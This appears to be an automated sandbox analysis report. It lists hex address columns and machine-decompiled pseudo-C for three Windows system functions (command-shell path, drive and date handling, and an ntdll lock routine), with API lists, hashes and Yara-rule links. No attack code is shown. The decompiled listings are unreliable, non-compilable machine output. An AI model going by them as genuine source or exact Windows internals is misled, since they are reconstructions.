                                0x4a5670ad
                                0x4a5670c7
                                0x00000000
                                0x00000000
                                0x4a5670cd
                                0x4a5670d2
                                0x4a554907
                                0x4a554907
                                0x4a55490d
                                0x4a554911
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554911
                                0x4a5548f8
                                0x4a554900
                                0x4a554906
                                0x00000000
                                0x4a554906
                                0x4a5548a7
                                0x4a5548a9
                                0x4a5548ad
                                0x00000000
                                0x00000000
                                0x4a5548bc
                                0x4a556c1c
                                0x4a556c23
                                0x00000000
                                0x00000000
                                0x4a556c2f
                                0x4a556c31
                                0x4a556c3b
                                0x00000000
                                0x00000000
                                0x4a567101
                                0x4a567102
                                0x4a567104
                                0x4a56711d
                                0x4a56711d
                                0x4a567122
                                0x4a567129
                                0x00000000
                                0x4a567129
                                0x4a5548c2
                                0x4a5548c4
                                0x4a5548c9
                                0x4a5548cb
                                0x4a5548d0
                                0x4a56710b
                                0x4a567115
                                0x4a567116
                                0x4a567118
                                0x00000000
                                0x4a567118
                                0x4a5548d6
                                0x00000000
                                0x4a554932
                                0x4a554932
                                0x4a554935
                                0x00000000
                                0x4a554888
                                0x4a554854
                                0x4a554859
                                0x4a554861
                                0x00000000
                                0x00000000
                                0x4a554867
                                0x4a55486d
                                0x4a554870
                                0x4a554875
                                0x4a554878
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle
                                • String ID: DPATH
                                • API String ID: 210771365-2010427443
                                • Opcode ID: fe05fdc040f6eef429726734aa37b25150c8937ef7433159f3eee2169c1c152d
                                • Instruction ID: 97d3a1b534bef0cba08190b9b3fbe0e491e3e64e6bb14caa1aa1c19b2da46df9
                                • Opcode Fuzzy Hash: fe05fdc040f6eef429726734aa37b25150c8937ef7433159f3eee2169c1c152d
                                • Instruction Fuzzy Hash: 1A7117B1510211EBDB25AF60CB44B2A7BB6EF90310F12896BE596EB15DDB70ED408B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55BF22, Relevance: 10.7, APIs: 7, Instructions: 213COMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E4A55BF22(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t44;
				void* _t48;
				void* _t49;
				void* _t55;
				long _t58;
				WCHAR* _t61;
				wchar_t* _t67;
				signed char _t68;
				long _t70;
				short _t74;
				long _t80;
				long _t82;
				wchar_t* _t88;
				wchar_t* _t93;
				short _t96;
				short _t99;
				signed int _t105;
				signed short* _t110;
				WCHAR* _t113;
				void* _t114;
				intOrPtr _t116;
				void* _t117;
				void* _t123;
				void* _t125;
				void* _t128;

				_push(0x44);
				_push(0x4a55c018);
				E4A5513E1(__ebx, __edi, __esi);
				_t116 =  *0x4a574081; // 0x0
				_t88 = 0;
				_t113 = E4A5522CA( *((intOrPtr*)( *((intOrPtr*)(_t114 + 8)) + 0x3c)), 0, 0 | _t116 != 0x00000000);
				 *(_t114 - 0x30) = _t113;
				_t117 =  *0x4a574081 - _t88; // 0x0
				if(_t117 == 0) {
					L4:
					_t44 = _t113;
					_t6 =  &(_t44[1]); // 0x2
					_t105 = _t6;
					do {
						_t93 =  *_t44;
						_t44 =  &(_t44[1]);
					} while (_t93 != _t88);
					_t48 = E4A552598(_t93, _t113);
					_t108 = (_t44 - _t105 >> 1) + 1;
					_t49 = E4A55185A(_t113, (_t44 - _t105 >> 1) + 1, _t48);
					 *0x4a574188 = _t88;
					if( *_t113 == _t88) {
						E4A56F174(_t49);
						L15:
						return E4A5513CA(_t88, _t108, _t113);
					}
					if(E4A55C039(_t93) == 0) {
						_push(_t88);
						_push(0x40002728);
						L41:
						E4A556D44(_t93);
						 *0x4a574188 = 1;
						goto L15;
					}
					_t123 =  *0x4a574081 - _t88; // 0x0
					if(_t123 == 0 ||  *_t113 != 0x5c) {
						L10:
						_t108 = 0;
						_t125 =  *0x4a574188 - _t108; // 0x0
						if(_t125 != 0) {
							L39:
							_t55 = E4A5572A1(__eflags);
							HeapFree(GetProcessHeap(), _t108, _t55);
							_push(_t108);
							_push( *0x4a574188);
							goto L41;
						}
						_t58 = E4A556C78(_t113, 1);
						 *0x4a574188 = _t58;
						if(_t58 == 0 && _t113[1] == 0x3a) {
							E4A552C56(_t88, _t105, 0, 0x4a575260, 0x104,  *_t113 & 0x0000ffff);
						}
						_t128 =  *0x4a574188 - _t108; // 0x0
						if(_t128 != 0) {
							goto L39;
						}
						goto L15;
					} else {
						__eflags = _t113[1] - 0x5c;
						if(__eflags != 0) {
							goto L10;
						}
						_t61 = _t113;
						_t9 =  &(_t61[1]); // 0x2
						_t105 = _t9;
						do {
							_t96 =  *_t61;
							_t61 =  &(_t61[1]);
							__eflags = _t96 - _t88;
						} while (_t96 != _t88);
						 *((intOrPtr*)(_t114 - 0x2c)) = (_t61 - _t105 >> 1) + 1;
						_t11 =  &(_t113[2]); // 0x4
						_t67 = wcschr(_t11, 0x5c);
						_t88 = _t67;
						 *(_t114 - 0x28) = _t67;
						__eflags = _t88;
						if(_t88 != 0) {
							_t88 = wcschr( &(_t88[0]), 0x5c);
							 *(_t114 - 0x28) = _t88;
							__eflags = _t88;
							if(_t88 != 0) {
								_t80 = GetFileAttributesW(_t113);
								__eflags = _t80 - 0xffffffff;
								if(_t80 != 0xffffffff) {
									 *_t88 = 0;
									_t88 =  &(_t88[0]);
									__eflags = _t88;
									 *(_t114 - 0x28) = _t88;
								} else {
									_t82 = GetLastError();
									 *0x4a574188 = _t82;
									__eflags = _t82 - 2;
									if(_t82 == 2) {
										 *0x4a574188 = 3;
									}
								}
							}
						}
						_t68 = 0x5a;
						 *(_t114 - 0x24) = _t68;
						_t99 = 0x3a;
						 *((short*)(_t114 - 0x22)) = _t99;
						 *((short*)(_t114 - 0x20)) = 0;
						 *(_t114 - 0x50) = 1;
						 *((intOrPtr*)(_t114 - 0x44)) = _t114 - 0x24;
						 *(_t114 - 0x40) = _t113;
						 *(_t114 - 0x38) =  *(_t114 - 0x38) & 0x00000000;
						_t93 =  *0x4a574188; // 0x0
						while(1) {
							__eflags = _t93;
							if(__eflags != 0) {
								goto L10;
							}
							__eflags = _t68 - 0x41;
							if(__eflags == 0) {
								goto L10;
							}
							 *((intOrPtr*)(_t114 - 4)) = 0;
							_push(0);
							_push(0);
							_push(0);
							_t70 = _t114 - 0x54;
							_push(_t70);
							L4A5724E9();
							 *0x4a574188 = _t70;
							 *((intOrPtr*)(_t114 - 4)) = 0xfffffffe;
							_t93 =  *0x4a574188; // 0x0
							__eflags = _t93;
							if(_t93 == 0) {
								_t93 =  *0x4a574114; // 0x0
								_t105 =  *0x4a574118; // 0x0
								 *((short*)(_t93 + _t105 * 8 - 4)) =  *(_t114 - 0x24);
								 *_t113 =  *(_t114 - 0x24);
								_t113[1] =  *((intOrPtr*)(_t114 - 0x22));
								_t74 = 0x5c;
								_t113[2] = _t74;
								__eflags = _t88;
								if(__eflags == 0) {
									_t113[3] = 0;
								} else {
									_t39 =  &(_t113[3]); // 0x6
									E4A55185A(_t39,  *((intOrPtr*)(_t114 - 0x2c)), _t88);
								}
								goto L10;
							} else {
								__eflags = _t93 - 0x55;
								if(_t93 == 0x55) {
									L35:
									_t68 = ( *(_t114 - 0x24) & 0x000000ff) - 1;
									 *(_t114 - 0x24) = _t68;
									_t93 = 0;
									 *0x4a574188 = 0;
									continue;
								}
								__eflags = _t93 - 0x4b2;
								if(_t93 != 0x4b2) {
									_t68 =  *(_t114 - 0x24);
									continue;
								}
								goto L35;
							}
						}
						goto L10;
					}
				} else {
					_t110 = E4A552ED1(_t113);
					while(_t110 > _t113 && iswspace( *_t110 & 0x0000ffff) != 0) {
						 *_t110 = 0;
						_t110 = _t110;
					}
					goto L4;
				}
			}




























                                0x4a55bf22
                                0x4a55bf24
                                0x4a55bf29
                                0x4a55bf33
                                0x4a55bf3d
                                0x4a55bf48
                                0x4a55bf4a
                                0x4a55bf4d
                                0x4a55bf53
                                0x4a55bf74
                                0x4a55bf74
                                0x4a55bf76
                                0x4a55bf76
                                0x4a55bf79
                                0x4a55bf79
                                0x4a55bf7d
                                0x4a55bf7e
                                0x4a55bf8a
                                0x4a55bf90
                                0x4a55bf93
                                0x4a55bf98
                                0x4a55bfa1
                                0x4a5681f3
                                0x4a55c00b
                                0x4a55c015
                                0x4a55c015
                                0x4a55bfae
                                0x4a56839a
                                0x4a56839b
                                0x4a5683a0
                                0x4a5683a0
                                0x4a5683a6
                                0x00000000
                                0x4a5683b0
                                0x4a55bfb4
                                0x4a55bfba
                                0x4a55bfc6
                                0x4a55bfc6
                                0x4a55bfc8
                                0x4a55bfce
                                0x4a56837d
                                0x4a56837d
                                0x4a56838b
                                0x4a568391
                                0x4a568392
                                0x00000000
                                0x4a568392
                                0x4a55bfd7
                                0x4a55bfdc
                                0x4a55bfe3
                                0x4a55bffa
                                0x4a55bffa
                                0x4a55bfff
                                0x4a55c005
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5681fd
                                0x4a5681fd
                                0x4a568202
                                0x00000000
                                0x00000000
                                0x4a568208
                                0x4a56820a
                                0x4a56820a
                                0x4a56820d
                                0x4a56820d
                                0x4a568211
                                0x4a568212
                                0x4a568212
                                0x4a56821c
                                0x4a568221
                                0x4a56822b
                                0x4a56822f
                                0x4a568231
                                0x4a568234
                                0x4a568236
                                0x4a568242
                                0x4a568244
                                0x4a568247
                                0x4a568249
                                0x4a56824c
                                0x4a568252
                                0x4a568255
                                0x4a568275
                                0x4a568279
                                0x4a568279
                                0x4a56827a
                                0x4a568257
                                0x4a568257
                                0x4a56825d
                                0x4a568262
                                0x4a568265
                                0x4a568267
                                0x4a568267
                                0x4a568265
                                0x4a568255
                                0x4a568249
                                0x4a56827f
                                0x4a568280
                                0x4a568286
                                0x4a568287
                                0x4a56828d
                                0x4a568291
                                0x4a56829b
                                0x4a56829e
                                0x4a5682a1
                                0x4a5682a5
                                0x4a5682b1
                                0x4a5682b1
                                0x4a5682b3
                                0x00000000
                                0x00000000
                                0x4a5682b9
                                0x4a5682bd
                                0x00000000
                                0x00000000
                                0x4a5682c5
                                0x4a5682c8
                                0x4a5682c9
                                0x4a5682ca
                                0x4a5682cb
                                0x4a5682ce
                                0x4a5682cf
                                0x4a5682d4
                                0x4a5682d9
                                0x4a568305
                                0x4a56830b
                                0x4a56830d
                                0x4a568335
                                0x4a56833b
                                0x4a568341
                                0x4a56834a
                                0x4a568351
                                0x4a568357
                                0x4a568358
                                0x4a56835c
                                0x4a56835e
                                0x4a568374
                                0x4a568360
                                0x4a568364
                                0x4a568368
                                0x4a568368
                                0x00000000
                                0x4a56830f
                                0x4a56830f
                                0x4a568312
                                0x4a56831c
                                0x4a568321
                                0x4a568323
                                0x4a568327
                                0x4a568329
                                0x00000000
                                0x4a568329
                                0x4a568314
                                0x4a56831a
                                0x4a5682ad
                                0x00000000
                                0x4a5682ad
                                0x00000000
                                0x4a56831a
                                0x4a56830d
                                0x00000000
                                0x4a5682b1
                                0x4a55bf55
                                0x4a55bf5b
                                0x4a55bf5d
                                0x4a5681e9
                                0x4a5681ed
                                0x4a5681ed
                                0x00000000
                                0x4a55bf5d

                                APIs
                                  • Part of subcall function 4A5522CA: iswspace.MSVCRT ref: 4A55238B
                                • iswspace.MSVCRT ref: 4A55BF65
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswspace
                                • String ID:
                                • API String ID: 2389812497-0
                                • Opcode ID: b9b39ca9d0cf5ecc228c80f42dd09e4a09d61d716ff6dbcfb93065e5457dda15
                                • Instruction ID: 4125dfc8e2fd348ce67d19d19be6050fff487d5b39d8a9b705e659011310e80c
                                • Opcode Fuzzy Hash: b9b39ca9d0cf5ecc228c80f42dd09e4a09d61d716ff6dbcfb93065e5457dda15
                                • Instruction Fuzzy Hash: 3A7137B4915601EEDB11EFA0DB84AAE3BFCEF59320F11441BE449EBA58E7304D80CB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56C53B, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 208timeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 39%
                                			E4A56C53B(void* __ecx, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v34;
				short _v36;
				short _v38;
				char _v40;
				char _v72;
				char _v596;
				signed int _v600;
				struct _SYSTEMTIME _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				short _t33;
				short _t34;
				short _t35;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t40;
				void* _t46;
				signed int _t48;
				signed short* _t49;
				void* _t62;
				intOrPtr* _t68;
				void* _t91;
				void* _t102;
				intOrPtr* _t103;
				signed int _t104;
				signed int _t107;
				void* _t108;

				_t91 = __ecx;
				_t31 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t31 ^ _t107;
				_t104 = _a8;
				_t103 = _a4;
				if(_t104 != 0) {
					_t33 = 0x3a;
					_v40 = _t33;
					_t34 = 0x2e;
					_v38 = _t34;
					_t35 =  *0x4a574950; // 0x0
					_v36 = _t35;
					E4A55185A( &_v34, 0xd, 0x4a574930);
				} else {
					E4A55185A( &_v40, 0x10, "/-.");
					E4A5520A9(_t104,  &_v40, 0x10, 0x4a574940);
				}
				L3:
				while(1) {
					if(_t103 == 0 ||  *_t103 == 0) {
						_t38 =  *0x4a5741d0; // 0x0
						_t39 = _t38;
						if(_t39 == 0) {
							_t40 = 0x2342;
						} else {
							if(_t39 == 0) {
								_t40 = 0x4000271d;
							} else {
								_t40 = 0x4000271e;
							}
						}
						if(_t104 != 0) {
							_push(0);
							_push(0x2343);
							E4A5599E1(_t91);
						} else {
							E4A5599E1(_t91, _t40, 1, 0x4a574940);
							_t108 = _t108 + 0xc;
						}
						_t43 =  &_v596;
						__imp___get_osfhandle( &_v596, 0x104,  &_v600);
						if(E4A5567D3(_t43, 0) == 0) {
							goto L39;
						} else {
							_t48 = _v600;
							if(_t48 == 0) {
								goto L39;
							}
							_t97 = 0;
							 *((short*)(_t107 + _t48 * 2 - 0x250)) = 0;
							_t49 =  &_v596;
							if(_v596 == 0) {
								L25:
								if(E4A553B03(_t49, _t97, 0) == 0) {
									E4A5558F3(L"%s\r\n",  &_v596);
									_pop(_t97);
								}
								goto L27;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								_t97 =  *_t49 & 0x0000ffff;
								if(_t97 == 0xa || _t97 == 0xd) {
									break;
								}
								_t49 =  &(_t49[1]);
								if( *_t49 == 0) {
									goto L25;
								}
							}
							_t97 = 0;
							 *_t49 = 0;
							goto L25;
						}
					} else {
						_t68 = _t103;
						_t102 = _t68 + 2;
						do {
							_t97 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t97 != 0);
						if(_t68 - _t102 >> 1 >= 0x104) {
							asm("sbb esi, esi");
							_t104 = ( ~_t104 & 0x00000003) + 0x232f;
							_push(0);
							_push(_t104);
							E4A5599E1(_t97);
							L38:
							L39:
							_t46 = 1;
							L40:
							return E4A5513A9(_t46, 0, _v8 ^ _t107, _t102, _t103, _t104);
						}
						E4A55185A( &_v596, 0x105, _t103);
						L27:
						E4A55185A( &_v72, 0x10,  &_v40);
						E4A5520A9(_t104,  &_v72, 0x10, 0x4a5538d4);
						_t103 = E4A5522CA( &_v596,  &_v72, 2);
						if( *_t103 == 0) {
							L36:
							_t46 = 0;
							goto L40;
						}
						GetLocalTime( &_v616);
						_push( &_v40);
						_push(_t103);
						_push( &_v616);
						if(_t104 != 0) {
							_t62 = E4A56C391();
						} else {
							_t62 = E4A56C245();
						}
						if(_t62 == 0) {
							L34:
							asm("sbb eax, eax");
							_push(0);
							_push(( ~_t104 & 0x00000003) + 0x232f);
							E4A5599E1(_t97);
							_pop(_t91);
							_t103 = 0;
							continue;
						} else {
							if(E4A56C21F( &_v616) != 0) {
								goto L36;
							}
							_t103 = GetLastError;
							if(GetLastError() == 0x522) {
								_push(0);
								_push(GetLastError());
								E4A556D44(_t97);
								goto L38;
							}
							goto L34;
						}
					}
				}
			}

































                                0x4a56c53b
                                0x4a56c546
                                0x4a56c54d
                                0x4a56c552
                                0x4a56c558
                                0x4a56c55d
                                0x4a56c583
                                0x4a56c586
                                0x4a56c58a
                                0x4a56c58b
                                0x4a56c58f
                                0x4a56c59a
                                0x4a56c5a4
                                0x4a56c55f
                                0x4a56c56a
                                0x4a56c57a
                                0x4a56c57a
                                0x00000000
                                0x4a56c5a9
                                0x4a56c5ab
                                0x4a56c5e7
                                0x4a56c5ec
                                0x4a56c5ee
                                0x4a56c602
                                0x4a56c5f0
                                0x4a56c5f2
                                0x4a56c5fb
                                0x4a56c5f4
                                0x4a56c5f4
                                0x4a56c5f4
                                0x4a56c5f2
                                0x4a56c609
                                0x4a56c61d
                                0x4a56c61e
                                0x4a56c623
                                0x4a56c60b
                                0x4a56c613
                                0x4a56c618
                                0x4a56c618
                                0x4a56c636
                                0x4a56c63e
                                0x4a56c64d
                                0x00000000
                                0x4a56c653
                                0x4a56c653
                                0x4a56c65b
                                0x00000000
                                0x00000000
                                0x4a56c661
                                0x4a56c663
                                0x4a56c66b
                                0x4a56c678
                                0x4a56c697
                                0x4a56c69f
                                0x4a56c6ad
                                0x4a56c6b3
                                0x4a56c6b3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56c67a
                                0x4a56c67a
                                0x4a56c67a
                                0x4a56c681
                                0x00000000
                                0x00000000
                                0x4a56c68a
                                0x4a56c68e
                                0x00000000
                                0x00000000
                                0x4a56c690
                                0x4a56c692
                                0x4a56c694
                                0x00000000
                                0x4a56c694
                                0x4a56c5b2
                                0x4a56c5b2
                                0x4a56c5b4
                                0x4a56c5b7
                                0x4a56c5b7
                                0x4a56c5bb
                                0x4a56c5bc
                                0x4a56c5ca
                                0x4a56c75c
                                0x4a56c761
                                0x4a56c767
                                0x4a56c768
                                0x4a56c769
                                0x4a56c77d
                                0x4a56c77f
                                0x4a56c781
                                0x4a56c782
                                0x4a56c790
                                0x4a56c790
                                0x4a56c5dd
                                0x4a56c6b4
                                0x4a56c6be
                                0x4a56c6ce
                                0x4a56c6e5
                                0x4a56c6ea
                                0x4a56c770
                                0x4a56c770
                                0x00000000
                                0x4a56c770
                                0x4a56c6f7
                                0x4a56c700
                                0x4a56c701
                                0x4a56c708
                                0x4a56c70b
                                0x4a56c714
                                0x4a56c70d
                                0x4a56c70d
                                0x4a56c70d
                                0x4a56c71b
                                0x4a56c73c
                                0x4a56c740
                                0x4a56c74a
                                0x4a56c74b
                                0x4a56c74c
                                0x4a56c752
                                0x4a56c753
                                0x00000000
                                0x4a56c71d
                                0x4a56c72b
                                0x00000000
                                0x00000000
                                0x4a56c72d
                                0x4a56c73a
                                0x4a56c774
                                0x4a56c777
                                0x4a56c778
                                0x00000000
                                0x4a56c778
                                0x00000000
                                0x4a56c73a
                                0x4a56c71b
                                0x4a56c5ab

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A56C63E
                                  • Part of subcall function 4A5567D3: GetFileType.KERNEL32 ref: 4A5567DB
                                • GetLocalTime.KERNEL32(?,?,?,00000002,?,00000010,4A5538D4,?,00000010,?,00000000,00000000), ref: 4A56C6F7
                                • GetLastError.KERNEL32 ref: 4A56C733
                                • GetLastError.KERNEL32(00000000), ref: 4A56C775
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLast$FileLocalTimeType_get_osfhandle
                                • String ID: %s$/-.
                                • API String ID: 2612908278-531045382
                                • Opcode ID: 0fbfb9b3a82bbbae86a1d4f238fe327d59afd2da020341d3ac501cbb1926236c
                                • Instruction ID: c86071ece0485881929d535b50e610170371ee5203623b7e04d8cea86ab9c8d9
                                • Opcode Fuzzy Hash: 0fbfb9b3a82bbbae86a1d4f238fe327d59afd2da020341d3ac501cbb1926236c
                                • Instruction Fuzzy Hash: 4051C4B290015AAADB10EAA4DF85EEE77BCEF85304F51046BE60AEF044E774DE44C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022D0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E022D0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023701c0;
									_push(_t144);
									_push(0);
									_t51 = E0228F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E022D4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E022E3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E022E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0231217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E022E3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E022D3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023701c0;
												_push(_t138);
												_push(0);
												_t58 = E0228F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E022D4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E022E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E022E3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0231217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E022E3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E022D3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E022B5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0228F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E022D3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0228F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E022D3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0228F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E022D3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E022B5329(_t110, _t138);
																_t69 = E022B53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                0x022d055a
                                0x022d055d
                                0x022d0563
                                0x022d0566
                                0x022d05d8
                                0x022d05e2
                                0x022d05e5
                                0x00000000
                                0x022d05e7
                                0x022d05e7
                                0x022d05ea
                                0x022d05f3
                                0x022d05f3
                                0x022d0568
                                0x022d0568
                                0x022d0568
                                0x022d0569
                                0x022d0569
                                0x022d0569
                                0x022d056b
                                0x00000000
                                0x00000000
                                0x022f217f
                                0x022f2183
                                0x022f225b
                                0x022f225f
                                0x022f2189
                                0x022f218c
                                0x022f218f
                                0x022f2194
                                0x022f2199
                                0x022f219d
                                0x022f21a0
                                0x022f21a2
                                0x022f21ce
                                0x022f21ce
                                0x022f21ce
                                0x022f21d0
                                0x022f21d6
                                0x022f21de
                                0x022f21e2
                                0x022f21e8
                                0x022f21e9
                                0x022f21ec
                                0x022f21f1
                                0x022f21f6
                                0x00000000
                                0x00000000
                                0x022f21f8
                                0x022f21fb
                                0x022f2206
